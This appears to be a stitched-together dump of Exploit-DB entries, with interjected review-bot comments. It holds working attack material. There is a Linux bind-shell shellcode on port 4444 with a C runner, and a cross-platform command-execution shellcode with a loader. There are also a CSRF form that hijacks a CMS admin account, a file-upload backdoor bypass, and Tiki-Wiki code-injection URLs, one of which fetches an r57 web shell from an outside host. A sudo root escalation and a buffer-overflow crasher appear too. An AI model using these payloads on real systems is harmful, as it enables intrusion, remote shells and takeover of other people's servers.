; Tested on: Linux 3.13.0-32, Ubuntu 12.04.5 LTS, X86
global _start
section .text
_start:
; Create the socket FD
; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
xor eax, eax
push eax ; this is for our first arg as it is needing be be 0 for IPPROTO_IP
mov ax, 102 ; moves syscall for socketcall into ax
xor ebx, ebx ; 0's out ebx
mov bl, 0x1 ; setting the socketcall type to sys_socket
push 0x1 ; we now pass 1 onto the stack for SOCK_STREAM
push 0x2 ; we now pass 2 onto the stack for AF_INET
mov ecx, esp; this moves the memory location of our args to ecx
int 0x80 ; execute the syscall socketcall
mov edx, eax ; This allows us to save the FD from the socket
; This avoids SIGSEGV when trying to reconnect
; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &socklen_t, socklen_t)
xor eax, eax; 0's our eax
mov ax, 102; moves syscall for socketcall into ax
xor ebx, ebx; 0's out ebx
mov bl, 0x14; moves the sys_setsocketopt as param 1
push 0x4; push the sizeof onto the stack
push esp; now we push the memory location of param 1(sizeof) onto the stack
push 0x2; we now set the SO_REUSEADDR onto the stack
push 0x1; we now set the SOL_SOCKET onto the stack
push edx; this pushes our previous socket FD onto the stack
mov ecx, esp; this pushes the memory location of our args into ecx
int 0x80; execute the syscall socketcall
; We now setup the bind
; bind(sockfd, [AF_INET, 11111, INADDR_ANY], 16)
xor eax, eax; 0's out eax
mov ax, 102; moves syscall for socketcall into ax
xor ebx, ebx; 0's out ebx
push ebx; this pushes 0 onto the stack for our first arg of INADDR_ANY for our local host
mov bl, 0x2; set the socketcall type to sys_bind
push WORD 0x5c11; we now set the port to bind on, in reverse order is 4444
push WORD 0x2; we now push the arg AF_INET onto the stack
mov ecx, esp; we now grab our memeory location to our args
push 0x16; we now set the sockaddr size onto the stack
push ecx; we now push our memory location of our previous args onto the stack
push edx; we push our current socket FD onto the stack
mov ecx, esp; we now get our new socket FD
int 0x80; execute the syscall socketcall
; We now need to setup a passive socket to wait for the new connection
; listen(sockfd, 0);
xor eax, eax; 0's our eax
xor ebx, ebx; 0's out ebx
push ebx; this pushes our 2nd arg for connection que size to 0
mov ax, 102; moves syscall for socketcall into ax
mov bl, 0x4; we now set the socketcall type to sys_listen
push edx; we now push our socket FD onto the stack
mov ecx, esp; we now move the memory location of our args list into ecx
int 0x80; execute the syscall for socketcall with the listen type
; We now accept the connection when it comes in
; accept(sockfd, NULL, NULL)
xor eax, eax; 0's our eax
xor ebx, ebx; 0's out ebx
push ebx; we add these 2 0's since we dont need information on the client connecting to us
push ebx
mov ax, 102; moves syscall for socketcall int ax
mov bl, 0x5; we set the socketcall type to sys_accept
push edx; we push our Socket FD onto the stack
mov ecx, esp; we grab the memeory location of our args and move it to ecx
int 0x80; execute the syscall socketcall
mov edx, eax; this saves the Socket FD for the client
; We can now use dup2 to create all 3 of our std's, in/out/err so that our shellhas access to it over the socket
; dup2(clientfd)
xor eax, eax; 0's out eax
xor ecx, ecx; 0's out ecx since our first std FD is in so its 0
mov al, 63; we now move the syscall for dup2 into al
mov ebx, edx; we now move the client socket FD into ebx
int 0x80; execute the dup2 syscall
xor eax, eax; 0's out the eax reg due to any return's happening
xor ecx, ecx; 0's out ecx
mov al, 63; this is the syscall for dup2
mov cl, 0x1; we now set cl to the FD of stdout
int 0x80; execut the dup2 syscall
xor eax, eax; 0's out eax
mov al, 63; moves the dup2 syscall
mov cl, 0x2; we now set cl to the stderr FD
int 0x80; execute the dup2 syscall
; We can now execute our shell in /bin/bash
xor eax, eax ; we first need our nulls
push eax ; this will push a drowd of nulls onto the stack
; this section of pushes are the string ////bin/bash from our pyhton 1 liner above
push 0x68736162
push 0x2f6e6962
push 0x2f2f2f2f
mov ebx, esp ; this moves the memory address of esp(pointing to our string & nulls)
; from the stack into ebx where execve is expecting the name of the application + a null
push eax ; this pushes another null onto the stack
mov edx, esp ; this now gets the memory address of the nulls we just pushed onto the stack into edx, this is for envp so it can just be null
push ebx ; this pushes the memory address of our string onto the stack
mov ecx, esp ; this moves the address of our string from the stack to ecx
mov al, 0xb ; this will load the syscall # 11
int 0x80 ; execute the system call
*/
// Python code to get the instruction in HEX of the string reversed to place into the stack
// python -c 'string="//etc/shadow";splitNum=8;print "\nLength: %s" % len(string[::-1]);string=string[::-1].encode("hex"); \
// string=["push 0x"+str(string[i:i+splitNum]) for i in range(0, len(string), splitNum)]; \
// print "Hex List:\n"; print("\n".join(h for h in string))'
// Port: 4444 (\x5c\x11) in shellcode
// ShellCode---
// Bytes: 656
// Tested on: Linux 3.13.0-32, Ubuntu 12.04.5 LTS, X86
//------------- OBJDUMP -------------
//execve-stack-bind: file format elf32-i386
//Disassembly of section .text:
//8048060 <_start>:
//8048060: 31 c0 xor eax,eax
//8048062: 50 push eax
//8048063: 66 b8 66 00 mov ax,0x66
//8048067: 31 db xor ebx,ebx
//8048069: b3 01 mov bl,0x1
//804806b: 6a 01 push 0x1
//804806d: 6a 02 push 0x2
//804806f: 89 e1 mov ecx,esp
//8048071: cd 80 int 0x80
//8048073: 89 c2 mov edx,eax
//8048075: 31 c0 xor eax,eax
//8048077: 66 b8 66 00 mov ax,0x66
//804807b: 31 db xor ebx,ebx
//804807d: b3 14 mov bl,0x14
//804807f: 6a 04 push 0x4
//8048081: 54 push esp
//8048082: 6a 02 push 0x2
//8048084: 6a 01 push 0x1
//8048086: 52 push edx
//8048087: 89 e1 mov ecx,esp
//8048089: cd 80 int 0x80
//804808b: 31 c0 xor eax,eax
//804808d: 66 b8 66 00 mov ax,0x66
//8048091: 31 db xor ebx,ebx
//8048093: 53 push ebx
//8048094: b3 02 mov bl,0x2
//8048096: 66 68 11 5c pushw 0x5c11
//804809a: 66 6a 02 pushw 0x2
//804809d: 89 e1 mov ecx,esp
//804809f: 6a 16 push 0x16
//80480a1: 51 push ecx
//80480a2: 52 push edx
//80480a3: 89 e1 mov ecx,esp
//80480a5: cd 80 int 0x80
//80480a7: 31 c0 xor eax,eax
//80480a9: 31 db xor ebx,ebx
//80480ab: 53 push ebx
//80480ac: 66 b8 66 00 mov ax,0x66
//80480b0: b3 04 mov bl,0x4
//80480b2: 52 push edx
//80480b3: 89 e1 mov ecx,esp
//80480b5: cd 80 int 0x80
//80480b7: 31 c0 xor eax,eax
//80480b9: 31 db xor ebx,ebx
//80480bb: 53 push ebx
//80480bc: 53 push ebx
//80480bd: 66 b8 66 00 mov ax,0x66
//80480c1: b3 05 mov bl,0x5
//80480c3: 52 push edx
//80480c4: 89 e1 mov ecx,esp
//80480c6: cd 80 int 0x80
//80480c8: 89 c2 mov edx,eax
//80480ca: 31 c0 xor eax,eax
//80480cc: 31 c9 xor ecx,ecx
//80480ce: b0 3f mov al,0x3f
//80480d0: 89 d3 mov ebx,edx
//80480d2: cd 80 int 0x80
//80480d4: 31 c0 xor eax,eax
//80480d6: 31 c9 xor ecx,ecx
//80480d8: b0 3f mov al,0x3f
//80480da: b1 01 mov cl,0x1
//80480dc: cd 80 int 0x80
//80480de: 31 c0 xor eax,eax
//80480e0: b0 3f mov al,0x3f
//80480e2: b1 02 mov cl,0x2
//80480e4: cd 80 int 0x80
//80480e6: 31 c0 xor eax,eax
//80480e8: 50 push eax
//80480e9: 68 62 61 73 68 push 0x68736162
//80480ee: 68 62 69 6e 2f push 0x2f6e6962
//80480f3: 68 2f 2f 2f 2f push 0x2f2f2f2f
//80480f8: 89 e3 mov ebx,esp
//80480fa: 50 push eax
//80480fb: 89 e2 mov edx,esp
//80480fd: 53 push ebx
//80480fe: 89 e1 mov ecx,esp
//8048100: b0 0b mov al,0xb
//8048102: cd 80 int 0x80
//------------- OBJDUMP -------------
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x66\xb8\x66\x00\x31\xdb\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80"
"\x89\xc2\x31\xc0\x66\xb8\x66\x00\x31\xdb\xb3\x14\x6a\x04\x54\x6a\x02\x6a\x01"
"\x52\x89\xe1\xcd\x80\x31\xc0\x66\xb8\x66\x00\x31\xdb\x53\xb3\x02\x66\x68"
"\x11\x5c" //<----PORT #4444
"\x66\x6a\x02\x89\xe1\x6a\x16\x51\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53"
"\x66\xb8\x66\x00\xb3\x04\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53\x53\x66\xb8"
"\x66\x00\xb3\x05\x52\x89\xe1\xcd\x80\x89\xc2\x31\xc0\x31\xc9\xb0\x3f\x89\xd3"
"\xcd\x80\x31\xc0\x31\xc9\xb0\x3f\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd"
"\x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f"
"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

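--- a/platforms/linux/local/39967.txt
+++ b/platforms/linux/local/39967.txt
@@ -0,0 +1,51 @@
+Product: Solarwinds Virtualization Manager
+Vendor: Solarwinds
+Vulnerable Version(s): < 6.3.1
+Tested Version: 6.3.1
+Vendor Notification: April 25th, 2016
+Vendor Patch Availability to Customers: June 1st, 2016
+Public Disclosure: June 14th, 2016
+Vulnerability Type: Security Misconfiguration
+CVE Reference: CVE-2016-3643
+Risk Level: High
+CVSSv2 Base Score: 7.8 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:W/RC:C/CR:M/IR:M/AR:M/MAV:L/MAC:L/MPR:L/MUI:N/MS:C/MC:H/MI:H/MA:H)
+Solution Status: Solution Available
+Discovered and Provided: Nate Kettlewell, Depth Security ( https://www.depthsecurity.com/ )
+-----------------------------------------------------------------------------------------------
+Advisory Details:
+Depth Security discovered a vulnerability in Solarwinds Virtualization Manager appliance.
+This attack requires a user to have an operating system shell on the vulnerable appliance.
+1) Misconfiguration of sudo in Solarwinds Virtualization Manager: CVE-2016-3643
+The vulnerability exists due to the miconfiguration of sudo in that it allows any local user to use sudo to execute commands as the superuser.
+A local attacker can obtain root privileges to the operating system regardless of privilege level.
+-----------------------------------------------------------------------------------------------
+Solution:
+Solarwinds has released a hotfix to remediate this vulnerability on existing installations.
+This flaw as well as several others have been corrected and that release has been put into manufacturing for new appliances.
+-----------------------------------------------------------------------------------------------
+Proof of Concept:
+The following is an example of the commands necessary for a low-privileged user to dump the contents of the "/etc/shadow" file by using sudo.
+sudo cat /etc/passwd
+-----------------------------------------------------------------------------------------------
+References:
+[1] Solarwinds Virtualization Manager- http://www.solarwinds.com/virtualization-manager - Solarwinds Virtualization Manager provides monitoring and remediation for virtualized environments.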
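Review bot: The proof-of-concept line `sudo cat /etc/passwd` does not match the sentence directly above it, which says the example dumps the "/etc/shadow" file; since /etc/passwd is normally readable by every user, the command as written does not show a privilege boundary being crossed, so the sentence and the command should be brought into agreement (either name the file the command actually reads, or use a command whose output only root could produce). The header `CVSSv2 Base Score: 7.8` is followed by a CVSS:3.0 vector string, so one of the two labels is wrong. In the Advisory Details, "miconfiguration" should read "misconfiguration".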


@ -0,0 +1,401 @@
/**
# Title : Execute command on Linux/Windows/BSD x86_64 execve("/bin//sh", {"//bin/sh", "-c", "cmd"}, NULL) shellcode
# Date : 04-06-2016
# Author : @odzhancode
# Tested On : Debian x86/x64, FreeBSD x64, OpenBSD x64, Windows x86, Windows x64
*/
; **************************************
; exec.asm
;
; Execute a command
; Works on 32/64-bit versions of Windows and Linux, 64-bit versions of FreeBSD/OpenBSD
;
; yasm -fbin exec.asm -oexec.bin
; nasm -fbin exec.asm -oexec.bin
;
; 194 bytes
;
bits 32
push esi
push edi
push ebx
push ebp
xor ecx, ecx ; ecx=0
mul ecx ; eax=0, edx=0
push eax
push eax
push eax
push eax
push eax ; setup homespace for win64
jmp l_sb ; load command
get_os:
pop edi ; edi=cmd, argv
mov cl, 7
; initialize cmd/argv regardless of OS
push eax ; argv[3]=NULL;
push edi ; argv[2]=cmd
repnz scasb ; skip command line
stosb ; zero terminate
push edi ; argv[1]="-c", 0
scasw ; skip option
stosb ; zero terminate
push edi ; argv[0]="/bin//sh", 0
push esp ; save argv
push edi ; save pointer to "/bin//sh", 0
mov al, 6 ; eax=sys_close for Linux/BSD
inc ecx ; ignored on x64
jecxz gos_x64 ; if ecx==0 we're 64-bit
; we're 32-bit
; if gs is zero, we're native 32-bit windows
mov cx, gs
jecxz win_cmd
; if eax is zero after right shift of SP, ASSUME we're on windows
push esp
pop eax
shr eax, 24
jz win_cmd
; we're 32-bit Linux
mov al, 11 ; eax=sys_execve
pop ebx ; ebx="/bin//sh", 0
pop ecx ; ecx=argv
int 0x80
; we're 64-bit, execute syscall and see what
; error returned
gos_x64:
push -1
pop edi
syscall
cmp al, 5 ; Access Violation indicates windows
push 59
pop eax
cdq
jz win_cmd
pop edi ; rdi="/bin//sh", 0
pop esi ; rsi=argv
syscall
l_sb:
jmp ld_cmd
; following code is derived from Peter Ferrie's calc shellcode
; i've modified it to execute commands
win_cmd:
pop eax ; eax="/bin//sh", 0
pop eax ; eax=argv
pop eax ; eax="/bin//sh", 0
pop eax ; eax="-c", 0
pop ecx ; ecx=cmd
pop eax ; eax=0
inc eax
xchg edx, eax
jz x64
push eax ; will hide
push ecx ; cmd
mov esi, [fs:edx+2fh]
mov esi, [esi+0ch]
mov esi, [esi+0ch]
lodsd
mov esi, [eax]
mov edi, [esi+18h]
mov dl, 50h
jmp lqe
bits 64
x64:
mov dl, 60h
mov rsi, [gs:rdx]
mov rsi, [rsi+18h]
mov rsi, [rsi+10h]
lodsq
mov rsi, [rax]
mov rdi, [rsi+30h]
lqe:
add edx, [rdi+3ch]
mov ebx, [rdi+rdx+28h]
mov esi, [rdi+rbx+20h]
add rsi, rdi
mov edx, [rdi+rbx+24h]
fwe:
movzx ebp, word [rdi+rdx]
lea rdx, [rdx+2]
lodsd
cmp dword [rdi+rax], 'WinE'
jne fwe
mov esi, [rdi+rbx+1ch]
add rsi, rdi
mov esi, [rsi+rbp*4]
add rdi, rsi
cdq
call rdi
cmd_end:
bits 32
pop eax
pop eax
pop eax
pop eax
pop eax
pop ebp
pop ebx
pop edi
pop esi
ret
ld_cmd:
call get_os
; place command here
;db "notepad", 0xFF
; do not change anything below
;db "-c", 0xFF, "/bin//sh", 0
// *************** xcmd.c
/**
Copyright © 2016 Odzhan. All Rights Reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE. */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#if defined (_WIN32) || defined(_WIN64)
#define WIN
#include <windows.h>
#else
#include <sys/mman.h>
#endif
#define CMD_LEN_OFS 0x10+1
#define EXEC_SIZE 194
char exec[]= {
/* 0000 */ "\x56" /* push esi */
/* 0001 */ "\x57" /* push edi */
/* 0002 */ "\x53" /* push ebx */
/* 0003 */ "\x55" /* push ebp */
/* 0004 */ "\x31\xc9" /* xor ecx, ecx */
/* 0006 */ "\xf7\xe1" /* mul ecx */
/* 0008 */ "\x50" /* push eax */
/* 0009 */ "\x50" /* push eax */
/* 000A */ "\x50" /* push eax */
/* 000B */ "\x50" /* push eax */
/* 000C */ "\x50" /* push eax */
/* 000D */ "\xeb\x37" /* jmp 0x46 */
/* 000F */ "\x5f" /* pop edi */
/* 0010 */ "\xb1\x00" /* mov cl, 0x0 */
/* 0012 */ "\x50" /* push eax */
/* 0013 */ "\x57" /* push edi */
/* 0014 */ "\xf2\xae" /* repne scasb */
/* 0016 */ "\xaa" /* stosb */
/* 0017 */ "\x57" /* push edi */
/* 0018 */ "\x66\xaf" /* scasw */
/* 001A */ "\xaa" /* stosb */
/* 001B */ "\x57" /* push edi */
/* 001C */ "\x54" /* push esp */
/* 001D */ "\x57" /* push edi */
/* 001E */ "\xb0\x06" /* mov al, 0x6 */
/* 0020 */ "\x41" /* inc ecx */
/* 0021 */ "\xe3\x12" /* jecxz 0x35 */
/* 0023 */ "\x66\x8c\xe9" /* mov cx, gs */
/* 0026 */ "\xe3\x20" /* jecxz 0x48 */
/* 0028 */ "\x54" /* push esp */
/* 0029 */ "\x58" /* pop eax */
/* 002A */ "\xc1\xe8\x18" /* shr eax, 0x18 */
/* 002D */ "\x74\x19" /* jz 0x48 */
/* 002F */ "\xb0\x0b" /* mov al, 0xb */
/* 0031 */ "\x5b" /* pop ebx */
/* 0032 */ "\x59" /* pop ecx */
/* 0033 */ "\xcd\x80" /* int 0x80 */
/* 0035 */ "\x6a\xff" /* push 0xffffffff */
/* 0037 */ "\x5f" /* pop edi */
/* 0038 */ "\x0f\x05" /* syscall */
/* 003A */ "\x3c\x05" /* cmp al, 0x5 */
/* 003C */ "\x6a\x3b" /* push 0x3b */
/* 003E */ "\x58" /* pop eax */
/* 003F */ "\x99" /* cdq */
/* 0040 */ "\x74\x06" /* jz 0x48 */
/* 0042 */ "\x5f" /* pop edi */
/* 0043 */ "\x5e" /* pop esi */
/* 0044 */ "\x0f\x05" /* syscall */
/* 0046 */ "\xeb\x75" /* jmp 0xbd */
/* 0048 */ "\x58" /* pop eax */
/* 0049 */ "\x58" /* pop eax */
/* 004A */ "\x58" /* pop eax */
/* 004B */ "\x58" /* pop eax */
/* 004C */ "\x59" /* pop ecx */
/* 004D */ "\x58" /* pop eax */
/* 004E */ "\x40" /* inc eax */
/* 004F */ "\x92" /* xchg edx, eax */
/* 0050 */ "\x74\x16" /* jz 0x68 */
/* 0052 */ "\x50" /* push eax */
/* 0053 */ "\x51" /* push ecx */
/* 0054 */ "\x64\x8b\x72\x2f" /* mov esi, [fs:edx+0x2f] */
/* 0058 */ "\x8b\x76\x0c" /* mov esi, [esi+0xc] */
/* 005B */ "\x8b\x76\x0c" /* mov esi, [esi+0xc] */
/* 005E */ "\xad" /* lodsd */
/* 005F */ "\x8b\x30" /* mov esi, [eax] */
/* 0061 */ "\x8b\x7e\x18" /* mov edi, [esi+0x18] */
/* 0064 */ "\xb2\x50" /* mov dl, 0x50 */
/* 0066 */ "\xeb\x17" /* jmp 0x7f */
/* 0068 */ "\xb2\x60" /* mov dl, 0x60 */
/* 006A */ "\x65\x48" /* dec eax */
/* 006C */ "\x8b\x32" /* mov esi, [edx] */
/* 006E */ "\x48" /* dec eax */
/* 006F */ "\x8b\x76\x18" /* mov esi, [esi+0x18] */
/* 0072 */ "\x48" /* dec eax */
/* 0073 */ "\x8b\x76\x10" /* mov esi, [esi+0x10] */
/* 0076 */ "\x48" /* dec eax */
/* 0077 */ "\xad" /* lodsd */
/* 0078 */ "\x48" /* dec eax */
/* 0079 */ "\x8b\x30" /* mov esi, [eax] */
/* 007B */ "\x48" /* dec eax */
/* 007C */ "\x8b\x7e\x30" /* mov edi, [esi+0x30] */
/* 007F */ "\x03\x57\x3c" /* add edx, [edi+0x3c] */
/* 0082 */ "\x8b\x5c\x17\x28" /* mov ebx, [edi+edx+0x28] */
/* 0086 */ "\x8b\x74\x1f\x20" /* mov esi, [edi+ebx+0x20] */
/* 008A */ "\x48" /* dec eax */
/* 008B */ "\x01\xfe" /* add esi, edi */
/* 008D */ "\x8b\x54\x1f\x24" /* mov edx, [edi+ebx+0x24] */
/* 0091 */ "\x0f\xb7\x2c\x17" /* movzx ebp, word [edi+edx] */
/* 0095 */ "\x48" /* dec eax */
/* 0096 */ "\x8d\x52\x02" /* lea edx, [edx+0x2] */
/* 0099 */ "\xad" /* lodsd */
/* 009A */ "\x81\x3c\x07\x57\x69\x6e\x45" /* cmp dword [edi+eax], 0x456e6957 */
/* 00A1 */ "\x75\xee" /* jnz 0x91 */
/* 00A3 */ "\x8b\x74\x1f\x1c" /* mov esi, [edi+ebx+0x1c] */
/* 00A7 */ "\x48" /* dec eax */
/* 00A8 */ "\x01\xfe" /* add esi, edi */
/* 00AA */ "\x8b\x34\xae" /* mov esi, [esi+ebp*4] */
/* 00AD */ "\x48" /* dec eax */
/* 00AE */ "\x01\xf7" /* add edi, esi */
/* 00B0 */ "\x99" /* cdq */
/* 00B1 */ "\xff\xd7" /* call edi */
/* 00B3 */ "\x58" /* pop eax */
/* 00B4 */ "\x58" /* pop eax */
/* 00B5 */ "\x58" /* pop eax */
/* 00B6 */ "\x58" /* pop eax */
/* 00B7 */ "\x58" /* pop eax */
/* 00B8 */ "\x5d" /* pop ebp */
/* 00B9 */ "\x5b" /* pop ebx */
/* 00BA */ "\x5f" /* pop edi */
/* 00BB */ "\x5e" /* pop esi */
/* 00BC */ "\xc3" /* ret */
/* 00BD */ "\xe8\x4d\xff\xff\xff" /* call 0xf */
};
// save code to binary file
void bin2file (uint8_t bin[], size_t len)
{
FILE *out=fopen ("sh_cmd.bin", "wb");
if (out!=NULL)
{
fwrite (bin, 1, len, out);
fclose (out);
}
}
// allocate read/write and executable memory
// copy data from code and execute
void xcode(void *code, size_t code_len, char *cmd, size_t cmd_len)
{
void *bin;
uint8_t *p;
char args[]="\xFF-c\xFF/bin//sh\x00";
size_t arg_len;
arg_len=strlen(args) + 1;
printf ("[ executing code...\n");
#ifdef WIN
bin=VirtualAlloc (0, code_len + cmd_len + arg_len,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
#else
bin=mmap (0, code_len + cmd_len + arg_len,
PROT_EXEC | PROT_WRITE | PROT_READ,
MAP_ANON | MAP_PRIVATE, -1, 0);
#endif
if (bin!=NULL)
{
p=(uint8_t*)bin;
memcpy (p, code, code_len);
// set the cmd length
p[CMD_LEN_OFS] = (uint8_t)cmd_len;
// copy cmd
memcpy ((void*)&p[code_len], cmd, cmd_len);
// copy argv
memcpy ((void*)&p[code_len+cmd_len], args, arg_len);
//DebugBreak();
bin2file(bin, code_len+cmd_len+arg_len);
// execute
((void(*)())bin)();
#ifdef WIN
VirtualFree (bin, code_len+cmd_len+arg_len, MEM_RELEASE);
#else
munmap (bin, code_len+cmd_len+arg_len);
#endif
}
}
int main(int argc, char *argv[])
{
size_t len;
char *cmd;
if (argc != 2) {
printf ("\n usage: xcmd <command>\n");
return 0;
}
cmd=argv[1];
len=strlen(cmd);
if (len==0 || len>255) {
printf ("\n invalid command length: %i (must be between 1 and 255)", len);
return 0;
}
xcode(exec, EXEC_SIZE, cmd, len);
return 0;
}
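Review bot: The allocation check `if (bin!=NULL)` in xcode is wrong for the POSIX branch: mmap() reports failure with MAP_FAILED rather than NULL, so a refused mapping (for example on a system that rejects PROT_WRITE|PROT_EXEC pages) falls through to memcpy on address -1 instead of being skipped. Adding `if (bin == MAP_FAILED) bin = NULL;` right after the mmap call inside the `#else` branch keeps the shared NULL check valid on both platforms. In main, `printf ("\n invalid command length: %i (must be between 1 and 255)", len);` passes a size_t to %i; `%zu` is the matching conversion. The usage text should also mention that xcode writes the assembled payload to `sh_cmd.bin` in the current directory via bin2file, since that side effect is not documented anywhere and bin2file silently does nothing when the file cannot be opened.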

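--- a/platforms/php/webapps/39963.txt
+++ b/platforms/php/webapps/39963.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Roxy Fileman <= 1.4.4 Forbidden File Upload Vulnerability
+# Google Dork: intitle:"Roxy file manager"
+# Date: 15-06-2016
+# Exploit Author: Tyrell Sassen
+# Vendor Homepage: http://www.roxyfileman.com/
+# Software Link: http://www.roxyfileman.com/download.php?f=1.4.4-php
+# Version: 1.4.4
+# Tested on: PHP
+1. Description
+The Roxy File Manager has a configuration setting named FORBIDDEN_UPLOADS,
+which keeps a list of forbidden file extensions that the application will
+not allow to be uploaded. This configuration setting is also checked when
+renaming an existing file to a new file extension.
+It is possible to bypass this check and rename already uploaded files to
+any extension, using the move function as this function does not perform
+any checks.
+2. Proof of Concept
+http://host/fileman/php/movefile.php?f=/Upload/backdoor.jpg&n=/Upload/backdoor.php
+The renamed file will now be accessible at http://host/Upload/backdoor.php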


@ -0,0 +1,47 @@
<!--
# Exploit Title: CSRF Vulnerability on Slim CMS v0.1
# CMS Link: https://github.com/revuls/SlimCMS/releases
# Date: 16th June'2016
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://www.slimcms.nl/
# Software Link: https://github.com/revuls/SlimCMS/releases
# Version: Slim CMSv0.1
# Tested on: Windows 10, XAMPP
# Twitter: https://twitter.com/m_avinash143
CSRF : Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
Vulnerability Description :
It is possible to change the password of the administrator and complete account can be take over using this.
Steps to Reproduce the same
1. Login into the account.
2. Navigate to http://localhost/SlimCMS/admin/config
3. Fill the details and intecept the request using BurpSuite
Request Intercepted
-------------------
-->
<html>
<body>
<form action="http://localhost/SlimCMS/api/config" method="POST">
<input type="hidden" name="title" value="&#123;&#123;7&#42;7&#125;&#125;" />
<input type="hidden" name="description" value="&#123;&#123;7&#42;7&#125;&#125;" />
<input type="hidden" name="user" value="admin" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="theme" value="default" />
<input type="hidden" name="url" value="http&#58;&#47;&#47;localhost&#47;SlimCMS" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!--
4. Send the link to victim and password will be changed for the admin user (Once the victim's clicks on the URL).
-->

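--- a/platforms/php/webapps/39965.txt
+++ b/platforms/php/webapps/39965.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Tiki-Calendar-RCE
+# Google Dork: inurl:tiki-calendar.php
+# Date: 2015-12-16
+# Exploit Author: Dany Ouellet
+# Vendor Homepage: https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki
+# Software Link: https://tiki.org/Download
+# Version: ALL supported versions of Tiki (14.2, 12.5 LTS, 9.11 LTS and 6.15)(if not patched)
+# Tested on: Windows and Linux
+Hi, I recently discover an important flaw in CMS Tiki-Wiki. I reported the
+vulnerability directly to vendor and a patch is now avalaible. So I release
+the exploit. ;)
+PoC:
+Validate the vulnerability:
+http://victimesite/tiki-calendar.php?viewmode=';print(TikiWikiRCE);$a='
+Write or deface the site:
+http://victimesite/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22index6.php%22,%27w%27);%20fwrite($z,(%22TikiWikiRCE%22));fclose($z);$a=%27
+Execute a php shellcode:
+http://victimesite/tiki-calendar.php?viewmode=%27;%20$z=fopen%28%22shell.php%22,%27w%27%29;fwrite%28$z,file_get_contents%28%22http://hackersite.com/r57.txt%22%29%29;fclose%28$z%29;%27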

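--- a/platforms/windows/dos/39966.txt
+++ b/platforms/windows/dos/39966.txt
@@ -0,0 +1,48 @@
+1. Vulnerable Product Version:
+*Blat v3.2.14*
+Link: blat.net
+2. Vulnerability Information
+Impact: Attacker may gain administrative access / can perform a DOS
+Remotely Exploitable: No
+Locally Exploitable: May be possible
+3. Product Details
+An open source Windows (32 & 64 bit) command line SMTP mailer. We can use
+it to automatically email logs, the contents of a html FORM, or whatever
+else you need to send.
+Since blat is lightweight, user friendly and simple (but awesome) many
+vendors incorporates it with their Softwares. I have seen blat in many
+commercial Softwares which use it for sending mails to its customers. And
+Blat is awesome.
+4. Vulnerability Description
+The Overflow vulnerability lies in the profile option parameter “p”. When
+a string of 236 bytes is send to blat, the EBP and EIP register gets
+overwritten by the user input.
+Reproduction:
+* blat.exe crashes with this command blat.exe install
+smtp.my.tld 127.0.0.1 p <”A”*234+”B”*2>*
+Feeding this command overwrites EBP with 0x00410041 and EIP with 0x00420042
+(Please refer to the attached screen shot)
+5. Links
+https://sourceforge.net/projects/blat/
+https://groups.yahoo.com/neo/groups/blat/conversations/messages/13759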


@ -0,0 +1,99 @@

Gemalto Sentinel License Manager 18.0.1 Directory Traversal Vulnerability
Vendor: Gemalto NV | SafeNet, Inc
Product web page: http://www.gemalto.com | http://www.safenet-inc.com
Affected version: 18.0.1.55505
Summary: The Sentinel License Manager enforces and manages licensing
in multi-user environment. It keeps track of all the licenses and
handles requests from network users who want to run your application,
granting authorization to the requesters to allow them to run the
application, and denying requests when all licenses are in use. It is
an integral component of the network licensing schemes that can be
implemented with Sentinel RMS, namely server-locked licenses, site
licenses and commuter licenses.
Desc: Input passed via the 'alpremove' and 'check_in_file' parameters
is not properly verified in '/_int_/action.html' and '/_int_/checkin_file.html'
before being used to delete and create files. This can be exploited to
arbitrarily delete sensitive information on a system and/or write files
via directory traversal attacks.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
HASP LM/18.00 (web server)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
